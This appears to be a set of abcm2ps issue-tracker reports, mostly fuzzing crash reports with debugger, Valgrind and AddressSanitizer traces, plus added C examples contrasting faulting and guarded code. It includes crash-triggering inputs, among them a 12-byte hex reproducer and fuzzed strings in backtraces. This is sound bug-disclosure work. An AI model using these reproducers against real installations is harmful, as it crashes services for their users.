 0x55555559024c → get_note(s=<optimized out>)
 0x55555559024c → do_tune()
 0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x64)
 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "$POC", linenum=0x64)
 0x555555579ee4 → frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
 0x55555555ce2d → treat_file(fn=0x7fffffffe26a "$POC", ext=<optimized out>)
 0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
deco_define (name=name@entry=0x0) at deco.c:989
989		l = strlen(name);
gef➤  p name
$101 = 0x0
gef➤  bt
#0  0x00007ffff69465a1 in __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1  0x0000555555566a90 in deco_define (name=name@entry=0x0) at deco.c:989
#2  0x0000555555567ed8 in deco_intern (s=0x555555875a00, ideco=<optimized out>) at deco.c:1022
#3  0x0000555555567ed8 in deco_cnv (dc=dc@entry=0x555555875c08, s=s@entry=0x555555875a00, prev=prev@entry=0x0) at deco.c:1049
#4  0x000055555559024c in get_note (s=<optimized out>) at parse.c:4377
#5  0x000055555559024c in do_tune () at parse.c:3510
gef➤  i r
rax            0x5555557c49a0	0x5555557c49a0
rbx            0x1	0x1
rcx            0x0	0x0
rdx            0x0	0x0
rsi            0x555555875a00	0x555555875a00
rdi            0x0	0x0
rbp            0x1	0x1
rsp            0x7fffffffd858	0x7fffffffd858
r8             0x56	0x56
r9             0x555555875550	0x555555875550
r10            0x55555588c408	0x55555588c408
r11            0x5555555a3b88	0x5555555a3b88
r12            0x555555875c08	0x555555875c08
r13            0x0	0x0
r14            0x0	0x0
r15            0x5555557be7d0	0x5555557be7d0
rip            0x7ffff69465a1	0x7ffff69465a1 <__strlen_avx2+17>
eflags         0x10283	[ CF SF IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0

Valgrind :

 Access not within mapped region at address 0x0
   at 0x4C32CF2: strlen (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
  by 0x11AA8F: deco_define (deco.c:989)
  by 0x11BED7: deco_intern (deco.c:1022)
  by 0x11BED7: deco_cnv (deco.c:1049)
  by 0x14424B: get_note (parse.c:4377)
  by 0x14424B: do_tune (parse.c:3510)
  Segmentation fault 

Reproducer file - Reproducer
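Added illustration, not abcm2ps code and not part of the report above: the quoted deco_define() loop rebuilt around a hypothetical user_deco list, first in the shape that faults on a NULL name and then with the guard that turns a NULL or empty name into a "not defined" result instead of a crash. The struct, the function names and the three sample entries are constructed for the example; the only thing taken from the report is the matching rule (name followed by a space in the entry text).

```c
#include <stddef.h>
#include <string.h>

/* One user decoration as the quoted loop sees it: text holds
 * "<name> <definition>", so a match is the name followed by a space.
 * Hypothetical layout, not the project's struct. */
struct user_deco {
    const char *text;
    struct user_deco *next;
};

/* Shape of the quoted deco_define() loop: strlen(NULL) faults before the
 * loop body is ever reached, which is the crash in the report. */
static const char *deco_find_unchecked(const struct user_deco *list, const char *name)
{
    size_t l = strlen(name);
    for (const struct user_deco *d = list; d; d = d->next) {
        if (strncmp(d->text, name, l) == 0 && d->text[l] == ' ')
            return d->text;
    }
    return NULL;
}

/* Same lookup with the guard the caller was missing: a NULL or empty name
 * cannot name a decoration, so report it as undefined. Entries with a
 * NULL text are skipped for the same reason. */
static const char *deco_find(const struct user_deco *list, const char *name)
{
    if (name == NULL || name[0] == '\0')
        return NULL;
    size_t l = strlen(name);
    for (const struct user_deco *d = list; d; d = d->next) {
        if (d->text != NULL && strncmp(d->text, name, l) == 0 && d->text[l] == ' ')
            return d->text;
    }
    return NULL;
}

/* Constructed sample table (hypothetical entries, not from abcm2ps).
 * "trem" sits first so a lookup of "tr" shows why the trailing-space
 * check is needed: a bare prefix compare would return the wrong entry. */
static struct user_deco sample3 = { "tr trill", NULL };
static struct user_deco sample2 = { "t tenuto", &sample3 };
static struct user_deco sample1 = { "trem tremolo", &sample2 };

/* Guarded lookup over the sample table; NULL or unknown names give NULL. */
const char *lookup_sample(const char *name)
{
    return deco_find(&sample1, name);
}

/* Unguarded lookup over the sample table; only safe for non-NULL names. */
const char *lookup_sample_unchecked(const char *name)
{
    return deco_find_unchecked(&sample1, name);
}
```

The guard belongs at the entry of the lookup rather than at the call site in deco_intern(): the report shows the NULL arriving through two layers of inlined calls, and a check at the boundary protects every caller at once.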

global buffer overflow subs.c:130 in cwid

Reproducer: abcm2ps-global-buffer-overflow-subs.c-cwid.abc.zip (SHA1: 0bb5bd5f8816137483183149f2e319bfb1af83f6)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b

00000000  58 3a 0a 4b 3a 0a 47 0a  77 3a 30 80              |X:.K:.G.w:0.|
0000000c
~/src/abcm2ps/abcm2ps abcm2ps-global-buffer-overflow-subs.c-cwid.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-global-buffer-overflow-subs.c-cwid.abc
=================================================================
==28346==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55f8791225a0 at pc 0x55f8790b80b7 bp 0x7ffdd1e58870 sp 0x7ffdd1e58868
READ of size 2 at 0x55f8791225a0 thread T0
    #0 0x55f8790b80b6 in cwid /home/hsalo/src/abcm2ps/subs.c:130
    #1 0x55f87901a155 in ly_width /home/hsalo/src/abcm2ps/music.c:941
    #2 0x55f8790286ec in set_width /home/hsalo/src/abcm2ps/music.c:1126
    #3 0x55f8790286ec in set_allsymwidth /home/hsalo/src/abcm2ps/music.c:1436
    #4 0x55f879048023 in output_music /home/hsalo/src/abcm2ps/music.c:5120
    #5 0x55f87907cd20 in generate /home/hsalo/src/abcm2ps/parse.c:1039
    #6 0x55f8790a437c in gen_ly /home/hsalo/src/abcm2ps/parse.c:1060
    #7 0x55f8790a437c in do_tune /home/hsalo/src/abcm2ps/parse.c:3621
    #8 0x55f878f229b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
    #9 0x55f878ffcdf8 in frontend /home/hsalo/src/abcm2ps/front.c:905
    #10 0x55f878f1af3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
    #11 0x55f878f172b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
    #12 0x7fd17cd832e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #13 0x55f878f19649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)

0x55f8791225a0 is located 0 bytes to the right of global variable 'cw_tb' defined in 'subs.c:42:14' (0x55f8791224a0) of size 256
SUMMARY: AddressSanitizer: global-buffer-overflow /home/hsalo/src/abcm2ps/subs.c:130 in cwid
Shadow bytes around the buggy address:
  0x0abf8f21c460: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0abf8f21c470: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0abf8f21c480: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
  0x0abf8f21c490: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0abf8f21c4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0abf8f21c4b0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
  0x0abf8f21c4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0abf8f21c4d0: 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
  0x0abf8f21c4e0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
  0x0abf8f21c4f0: 06 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0abf8f21c500: 04 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==28346==ABORTING

Sample minimized using afl-tmin:

File size reduced by : 93.88% (to 12 bytes)
Characters simplified : 1333.33%
Number of execs done : 134
Fruitless execs : path=70 crash=0 hang=0
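Added example, not part of the report and not abcm2ps code: a character-width lookup in the shape ASan describes above, shown unguarded and guarded. It assumes cw_tb is a 128-entry table of 2-byte widths, which is consistent with the 256-byte object and the 2-byte read exactly at its end (index 128 is the 0x80 byte in the reproducer); the names, the width values and the UTF-8 handling are the example's own, not the project's.

```c
#include <stddef.h>

#define CW_ENTRIES 128          /* assumed: ASCII-only width table */
#define CW_DEFAULT 600          /* assumed fallback width for bytes >= 0x80 */

/* Per-character advance widths in 1/1000 em. 128 entries of 2 bytes is
 * 256 bytes, the object size ASan reports for cw_tb. Values constructed. */
static short cw_tb[CW_ENTRIES];
static int cw_ready;

static void cw_ensure(void)
{
    if (cw_ready)
        return;
    for (int i = 0; i < CW_ENTRIES; i++)
        cw_tb[i] = (i >= 0x20 && i < 0x7f) ? 500 : 0;
    cw_tb[' '] = 250;
    cw_ready = 1;
}

/* Shape of the faulting lookup: any byte >= 0x80 reads past the table.
 * Kept for comparison; never call it with such a byte. */
static short cwid_unchecked(unsigned char c)
{
    cw_ensure();
    return cw_tb[c];
}

/* Guarded lookup: a byte outside the table gets the fallback width. */
short cwid(unsigned char c)
{
    cw_ensure();
    return c < CW_ENTRIES ? cw_tb[c] : CW_DEFAULT;
}

/* Width of a lyric string. The input is treated as UTF-8: a lead byte
 * counts as one glyph of fallback width, a continuation byte (10xxxxxx)
 * adds nothing, so a stray 0x80 like the reproducer's is ignored rather
 * than used as a table index. NULL is measured as empty. */
int text_width(const char *s)
{
    if (s == NULL)
        return 0;
    int w = 0;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++) {
        if (*p < 0x80)
            w += cwid(*p);
        else if ((*p & 0xC0) != 0x80)
            w += CW_DEFAULT;
    }
    return w;
}

int main(void)
{
    /* ASCII bytes are in range for both lookups; only the guarded one
     * may be handed a byte >= 0x80. */
    return (cwid_unchecked('A') == cwid('A') && cwid(0x80) == CW_DEFAULT) ? 0 : 1;
}
```

The fix that matters is the comparison against the table length, done on an unsigned byte; with a plain char the same lookup would also go negative on signed-char targets and read in front of the table instead of behind it.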

Parsing this ABC to SVG shows a width error? It is too small.

X:1
T:1.right hand
C:tom
%%scale 0.85
%%pagewidth 21.59cm
%%leftmargin 2.54cm
%%rightmargin 1.26cm
%%score { 1 | 2 }
L:1/4
Q:1/4=120
M:4/4
I:linebreak $
K:C
V:1 treble
V:2 bass
V:1
!1!C4 | C4 | C4 | C4 |] %4
V:2
z4 | z4 | z4 | z4 |] %4

memory access violation draw.c:1205 in draw_bar(struct SYMBOL *s, float bot, float h)

https://drive.google.com/open?id=1oDJS29GBoRR8Wl2X9MMRycW0DMVieOYc

(gdb) set args POC5
(gdb) r

abcm2ps-8.13.20 (2018-02-21)
File POC5
POC5:7:3: error: Bad character
7 :ReÜa:K:eæ]E
^

.
.
.
Program received signal SIGSEGV, Segmentation fault.
0x00000000004bc344 in draw_bar (h=24, bot=-51, s=0x847fd8) at draw.c:1205
1205 for (s2 = s->prev; s2->abc_type != ABC_T_REST; s2 = s2->prev)

(gdb) bt
#0 0x00000000004bc344 in draw_systems (h=24, bot=-51, s=0x847fd8) at draw.c:1205
#1 0x00000000004bc344 in draw_systems (indent=indent@entry=0) at draw.c:4570
#2 0x000000000052ffd5 in output_music (indent=0) at music.c:5088
#3 0x000000000052ffd5 in output_music () at music.c:5139
#4 0x000000000054d511 in generate () at parse.c:1039
#5 0x00000000005709cd in do_tune (eob=0) at parse.c:1060
#6 0x00000000005709cd in do_tune () at parse.c:3620
#7 0x0000000000414731 in abc_eof () at abcparse.c:200
#8 0x00000000004e45e9 in frontend (s=,
s@entry=0x827a40 "&&\rX:MPRe\a:K:\a\ae]\377:K:\a>K\005\377\377\005]E\rKPRe\a:e\aenE.PRe\rPRee\\a:&&Y]E\rt\177f\a:e]E\rK:vE\r:Re\334a:K:e\ae]E\rPRe\a:6&ae]E]\005\377\377:K:\a>K\005\377\377\005]E\rKPRe\a:e\aenE.PRe\rPRee\\a:"&Y]E\re\a:e\aenE.PRe\rPRea:P\177f\a:enK:e\E0K>]E\rK>"..., ftype=ftype@entry=0, fname=fname@entry=0x825ea0 "POC5", linenum=35, linenum@entry=0) at front.c:901
#9 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#10 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040

(gdb) list
1200 if (s->u.bar.len != 0) {
1201 struct SYMBOL *s2;
1202
1203 set_scale(s);
1204 if (s->u.bar.len == 1) {
1205 for (s2 = s->prev; s2->abc_type != ABC_T_REST; s2 = s2->prev)
1206 ;
1207 putxy(s2->x, yb + 12);
1208 a2b("mrep\n");
1209 } else {

stack-buffer-overflow parse.c:4081 in get_key(struct SYMBOL *s)

https://drive.google.com/open?id=1HE9cht7WJPauA66acyJrEywXX8R4Hg-2

(gdb) set args POC2
(gdb) r
Starting program: /home/afl/parse/eval/abcm2ps/new_ver/abcm2ps/abcm2ps POC2
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
abcm2ps-8.13.20 (2018-02-21)
File POC2
POC2:6:2: error: Bad character
6 [1�
^
POC2:6:3: error: Bad character
6 [1�
^
*** stack smashing detected ***: /home/afl/parse/eval/abcm2ps/new_ver/abcm2ps/abcm2ps terminated

Program received signal SIGABRT, Aborted.
0x00007ffff68bc428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) bt
#0 0x00007ffff68bc428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff68be02a in __GI_abort () at abort.c:89
#2 0x00007ffff68fe7ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff6a1649f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff69a015c in __GI___fortify_fail (msg=,
msg@entry=0x7ffff6a16481 "stack smashing detected") at fortify_fail.c:37
#4 0x00007ffff69a0100 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x0000000000546f05 in get_key (s=s@entry=0x82a828) at parse.c:4081
#6 0x00000000005684c8 in get_info (s=s@entry=0x82a828) at parse.c:2882
#7 0x0000000000574348 in do_tune () at parse.c:3484
#8 0x0000000000414731 in abc_eof () at abcparse.c:200
#9 0x00000000004e45e9 in frontend (s=,
s@entry=0x827ea0 "C>ZE\rC3\356E\rX:\374\rK:P>b_g=C&C,f\347(C&C\250:5ZV"Cx\001E\rw:\347\r[1\233", ftype=ftype@entry=0, fname=fname@entry=0x827ee0 "POC2", linenum=6, linenum@entry=0) at front.c:901
#10 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#11 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040

Null pointer dereference vulnerability in the function set_bar_num( )

A Null Pointer Dereference vulnerability was discovered in abcm2ps (8.14.1-master).

Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master

Command -
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

s->next = s2;
s->prev = s2->prev;
->    s->prev->next = s;
s2->prev = s;
s->ts_next = s2;

Debug:

GDB :

0x00000000004a095d in set_bar_num () at parse.c:921
921                s->prev->next = s;
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax   : 0x0               
$rbx   : 0x7fffffffda00      →  0x0000000041b58ab3
$rcx   : 0x0               
$rdx   : 0x62900000bbd0      →  0x000062900000be28  →  0x000062900000c080  →  0x000062900000c2d0  →  0x000062900000c520  →  0x000062900000c770  →  0x000062900000c9c0  →  0x000062900000cc18
$rsp   : 0x7fffffffd870      →  0x0000000000000000
$rbp   : 0x7fffffffd8b0      →  0x00007fffffffd8d0  →  0x00007fffffffd8f0  →  0x00007fffffffd940  →  0x00007fffffffd970  →  0x00007fffffffd990  →  0x00007fffffffda80  →  0x00007fffffffdac0
$rsi   : 0x0               
$rdi   : 0x3               
$rip   : 0x4a095d            →  <set_bar_num+1916> mov QWORD PTR [rax+0x10], rdx
$r8    : 0x0               
$r9    : 0xc52800003e2       →  0x0000000000000000
$r10   : 0x1               
$r11   : 0x246             
$r12   : 0xffffffffb40       →  0x0000000000000000
$r13   : 0x7fffffffda60      →  0x00007fffffffdb80  →  0x0000000041b58ab3
$r14   : 0x7fffffffda00      →  0x0000000041b58ab3
$r15   : 0x7fffffffdb80      →  0x0000000041b58ab3
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$fs: 0x0000  $ds: 0x0000  $ss: 0x002b  $gs: 0x0000  $es: 0x0000  $cs: 0x0033  
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffd870│+0x00: 0x0000000000000000     ← $rsp
0x00007fffffffd878│+0x08: 0x0000060000000600  →  0x0000000000000000
0x00007fffffffd880│+0x10: 0x0000000100000001  →  0x0000000000000000
0x00007fffffffd888│+0x18: 0x00000ffffffffb40  →  0x0000000000000000
0x00007fffffffd890│+0x20: 0x000062900000bbd0  →  0x000062900000be28  →  0x000062900000c080  →  0x000062900000c2d0  →  0x000062900000c520  →  0x000062900000c770  →  0x000062900000c9c0
0x00007fffffffd898│+0x28: 0x000062900000b728  →  0x000062900000b978  →  0x000062900000bbd0  →  0x000062900000be28  →  0x000062900000c080  →  0x000062900000c2d0  →  0x000062900000c520
0x00007fffffffd8a0│+0x30: 0x00007fffffffd8b0  →  0x00007fffffffd8d0  →  0x00007fffffffd8f0  →  0x00007fffffffd940  →  0x00007fffffffd970  →  0x00007fffffffd990  →  0x00007fffffffda80
0x00007fffffffd8a8│+0x38: 0x000000000049f3e9  →  <system_init+19> nop 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
     0x4a0951 <set_bar_num+1904> mov    rdi, rdx
     0x4a0954 <set_bar_num+1907> call   0x402c90 <__asan_report_store8@plt>
     0x4a0959 <set_bar_num+1912> mov    rdx, QWORD PTR [rbp-0x20]
 →   0x4a095d <set_bar_num+1916> mov    QWORD PTR [rax+0x10], rdx
     0x4a0961 <set_bar_num+1920> mov    rax, QWORD PTR [rbp-0x18]
     0x4a0965 <set_bar_num+1924> mov    rdx, QWORD PTR [rbp-0x20]
     0x4a0969 <set_bar_num+1928> mov    QWORD PTR [rax+0x18], rdx
     0x4a096d <set_bar_num+1932> mov    rax, QWORD PTR [rbp-0x20]
     0x4a0971 <set_bar_num+1936> mov    rdx, QWORD PTR [rbp-0x18]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:parse.c+921 ]────
    916                 s->prev->next = s->next;
    917                 s->ts_next->ts_prev = s->ts_prev;
    918                 s->ts_prev->ts_next = s->ts_next;
    919                 s->next = s2;
    920                 s->prev = s2->prev;
        // s=0x00007fffffffd890  →  [...]  →  0x000062900000c9c0
 →  921                 s->prev->next = s;
    922                 s2->prev = s;
    923                 s->ts_next = s2;
    924                 s->ts_prev = s2->ts_prev;
    925                 s->ts_prev->ts_next = s;
    926                 s2->ts_prev = s;
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x4a095d → Name: set_bar_num()
[#1] 0x4a1346 → Name: generate()
[#2] 0x4a16eb → Name: gen_ly(eob=0x0)
[#3] 0x4b45a0 → Name: do_tune()
[#4] 0x407292 → Name: abc_parse(p=0x625000000100 "", fname=0x606000000a40 "POC", ln=0xe)
[#5] 0x46a4ad → Name: txt_add_eos(fname=0x606000000a40 "POC", linenum=0xe)
[#6] 0x46d6b0 → Name: frontend(s=0x61f0000001f1 "\nX:2\nT:Key signature change\nT:and multi-measure rest\nM:2\nL:1/4\nK:C\nZ4|\"C\"CEGc|[K:A]\"A\"Acea|[K:B]\"B\"Bdfb|[K:A]\"A\"Acea|\n[K:Eb]\"Eb\"EGBe|[K:Cb]\"Cb\"CEGc|[K:C]\"C\"CEGc|\n\nX:3\nT:All clefs with max signatures\nM:C\nL:1/4\nK:C# bass\nC,E,G,C|[K:Cb]C,E,G,C|[K:C# bass3]C,E,G,C|\n[K:Cb]C,E,G,C|[K:C# alto4]G,CEG|[K:Cb]G,CEG|\n[K:C# alto]G,CEG|[K:Cb]G,CEG|[K:C# alto2]CEGc|\n[K:Cb]CEGc|[K:C# alto1]CEGc|[K:Cb]CEGc|\n[K:C# treble]CEGc|[K:Cb]CEGc|[K:C]CEGc|\n\nX:4\nT:Guitar chords - annotations\nM:none\nL:1/4\nK:C\n\"^no time\"\"^signature\"CD\"gchord\"\"^on bar\"|EF\\\n\"^appogiattura\"{B}c \"^acciaccatura\"{/B}c \\\n\"^three;annot;lines\"G \"^and\"\"^four\"\"^annot\"\"^lines!\"c| \\\n\"^Fa#\"^F \"^Sib\"_B \"^Fa=\"=F \\\n\"F#\"^F \"Bb\"_B||\n\nX:5\nT:Standard decorations\nM:none\nL:1/8\nK:C\n~C.D JENF HCRD TEuF vcLB MAPG ScOB|\nw: \\~ . J N H R T u v L M P S O\nw: grace dot slide tenuto fermata roll trill upbow downbow \\\nw: emphasis lmordent umordent segno coda\n\nX:6\nT:All decorations\nM:none\nL:1/8\nK:C\n!0!C!1!D !2!E!3!F !4!G!5!A !+!B!accent!c|\\\nw:~0 ~1 ~2 ~3 ~4 ~5 ~+ accent\n!breath!C!crescendo(!D !crescendo)!E!D.C.!F !diminuendo(!G!diminuendo)!A !f!B!ffff!c|\nw:breath crescendo( crescendo) D.C. 
diminuendo( diminuendo) ~f ffff\n!fine!C!invertedfermata!D !longphrase!E !mediumphrase!F !mf!G!open!A !p!B!pppp!c|\nw:fine invertedfermata longphrase mediumphrase mf open ~p pppp\n!pralltriller!C!sfz!D !shortphrase!E !snap!F !thumb!G!turn!A!wedge!B!D.S.!c|\nw:pralltriller sfz shortphrase snap thumb turn wedge D.S.\n\nX:7\nT:Non standard decorations\nC:Composer\nO:Origin\nR:Rhythm\nM:none\nL:1/8\nK:C\n!turnx!G!invertedturn!A !invertedturnx!B !arpeggio![EGc]|\\\nw:turnx invertedturn invertedturnx arpeggio\n!trill(!c4-|!trill)!c3|\nw:trill( trill)\n\nX:8\nT:Decorations on two voices\nT:(also in 'd:' lines)\n%%infoline 1\nC:Composer\nO:Origin\nR:Rhythm\nM:C\n%%staves (1 2)\nK:C\nV:1\n  ~c.dJeNf cdef|aabc' gabc'|!coda!cdef gfec||\nd: * * * * HRTu|!mf!       |!sfz!  *** ***!D.S.!\nV:2\n   CDEF    CDEF|ffga   efga|C  D  EF   [EG]FEC||\nd: ~.JN    HRTu|~.JN   HRTu|!5!!4!M*   !5! M\nd:", ' ' <repeats 13 times>, "|", ' ' <repeats 11 times>, "|*  P  !3!  !4!\n\nX:9\nT:Beams\nL:1/16\nM:4/4\nK:C\n(3CDE(3FGA B/c/d/e/d/c/B/A/ (3zDE(3FGz z/c/d/e/d/c/B/z/|(3CDz(3zGA B/c/d/z/z/c/B/A/ G8|\n\nX:10\nT:Voice overlap\nT:invisible and dashed bars\nM:2/4\nL:1/8\n%%staves (1 2)\nK:C\nV:1\nFEDC:GGGG|G2 G2|c4[|]GABc|\nV:2\nGABc:FEDC|GD G>D|cBAG[|]G4|\n\nX:11\nT:Clef transpositions\nM:C\nL:1/4\nK:C\n%%titleleft 1\nT:No transposition\n\"^clef=treble\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:alto]\"^alto\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:bass]\"^bass\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\nT:abc2ps compatible clef transposition\n%%abc2pscompat 1\n[K:treble]\"^treble\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:alto]\"^alto\"\"A\"A\"B\"B\"c\"c\"d\"d|\\\n[K:bass]\"^bass\"\"a\"a\"b\"b\"c'\"c'\"d'\"d'|\n%%titleleft 0\n", ftype=0x0, fname=0x606000000a40 "POC", linenum=0xe)
[#7] 0x403a4a → Name: treat_file(fn=0x7fffffffe21e "POC", ext=0x4ec860 "abc")
[#8] 0x403b5e → Name: treat_abc_file(fn=0x7fffffffe21e "POC")
[#9] 0x40647f → Name: main(argc=0x17, argv=0x7fffffffddb8)

gef➤  p s->prev
$1 = (struct SYMBOL *) 0x0
gef➤  p *s->prev
Cannot access memory at address 0x0

Reproducer file - Reproducer
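Added example, not part of the report and not abcm2ps code: the "move s in front of s2" sequence quoted from parse.c:919-926, rebuilt on a hypothetical symbol list that carries a head pointer, so the case where s2 is the first symbol (s2->prev == NULL, which is what the debugger shows at line 921) updates the head instead of writing through a NULL pointer. Only the prev/next chain is modelled; the ts_prev/ts_next chain in the original needs the same guard at line 925. Struct names, the list type and the sample order are constructed.

```c
#include <stddef.h>

/* Hypothetical symbol with the two links the quoted code manipulates. */
struct sym {
    int id;
    struct sym *prev, *next;
};

/* The original walks a chain with no explicit head; here one is kept so
 * that an insert at the front has something to update. */
struct symlist {
    struct sym *head, *tail;
};

static void append_sym(struct symlist *l, struct sym *s)
{
    s->next = NULL;
    s->prev = l->tail;
    if (l->tail) l->tail->next = s; else l->head = s;
    l->tail = s;
}

/* Detach s from wherever it is; safe at either end of the list. */
static void unlink_sym(struct symlist *l, struct sym *s)
{
    if (s->prev) s->prev->next = s->next; else l->head = s->next;
    if (s->next) s->next->prev = s->prev; else l->tail = s->prev;
    s->prev = s->next = NULL;
}

/* Insert s immediately before s2. The quoted code does
 *     s->prev = s2->prev;  s->prev->next = s;
 * unconditionally; when s2 is the first symbol s2->prev is NULL and the
 * second statement is the reported store through address 0x10. */
static void insert_before(struct symlist *l, struct sym *s, struct sym *s2)
{
    s->next = s2;
    s->prev = s2->prev;
    if (s2->prev) s2->prev->next = s; else l->head = s;   /* the missing check */
    s2->prev = s;
}

/* Move s in front of s2. Returns 0, or -1 for a move that makes no sense. */
int move_before(struct symlist *l, struct sym *s, struct sym *s2)
{
    if (l == NULL || s == NULL || s2 == NULL || s == s2)
        return -1;
    unlink_sym(l, s);          /* must happen first: s may be s2->prev */
    insert_before(l, s, s2);
    return 0;
}

static struct sym *find_sym(const struct symlist *l, int id)
{
    for (struct sym *p = l->head; p; p = p->next)
        if (p->id == id) return p;
    return NULL;
}

/* Build the constructed list 1,2,3,4, move symbol s_id in front of s2_id
 * and return the resulting order as decimal digits (e.g. 3124), -1 for a
 * rejected move, or -2 if the prev links no longer mirror the next links. */
int sample_move(int s_id, int s2_id)
{
    struct sym pool[4];
    struct symlist l = { NULL, NULL };
    for (int i = 0; i < 4; i++) {
        pool[i].id = i + 1;
        append_sym(&l, &pool[i]);
    }
    if (move_before(&l, find_sym(&l, s_id), find_sym(&l, s2_id)) != 0)
        return -1;
    int fwd = 0, back = 0, rev = 0;
    for (struct sym *p = l.head; p; p = p->next) fwd = fwd * 10 + p->id;
    for (struct sym *p = l.tail; p; p = p->prev) back = back * 10 + p->id;
    for (int v = fwd; v; v /= 10) rev = rev * 10 + v % 10;
    return back == rev ? fwd : -2;   /* backward walk must reverse the forward one */
}
```

sample_move(3, 1) is the case from the report: the target is the head of the list, and the guarded insert returns 3124 with both link directions consistent, where the unguarded sequence would fault.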

Volta bracket for second and subsequent endings dependent on length of first ending

If the second or subsequent endings are longer than the first ending, the volta bracket above the longer endings is only as long as the first ending. Sample ABC to reproduce:

X:1
T:Volta test
L:1/4
K:C
|: ABCD |1 EFGA :|2 BCDE | FGAB :|3 CDEF | GABC || DEFG |]

There should be volta brackets above the second measures of the second and third endings, but only the first measure gets them, presumably because the first ending only has one measure:

Screen Shot 2019-05-05 at 8 54 09 PM

If you insert an invisible bar in the first ending, then the other endings get the right length for their volta brackets:

|: ABCD |1 EFGA [|] :|2 BCDE | FGAB :|3 CDEF | GABC || DEFG |]

Screen Shot 2019-05-05 at 8 57 04 PM

The standard says of multiple endings that:

The Nth ending starts with [N and ends with one of ||, :| |] or [|.

So it seems like each ending should be allowed an independent length, rather than being based on the first ending.

If I can figure out how volta brackets are being calculated and displayed, I'll try to write a patch, but I'm not much of a programmer.

Null pointer dereference vulnerability in the function init_music_line( )

A Null Pointer Dereference vulnerability was discovered in abcm2ps (8.14.1-master).

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command -
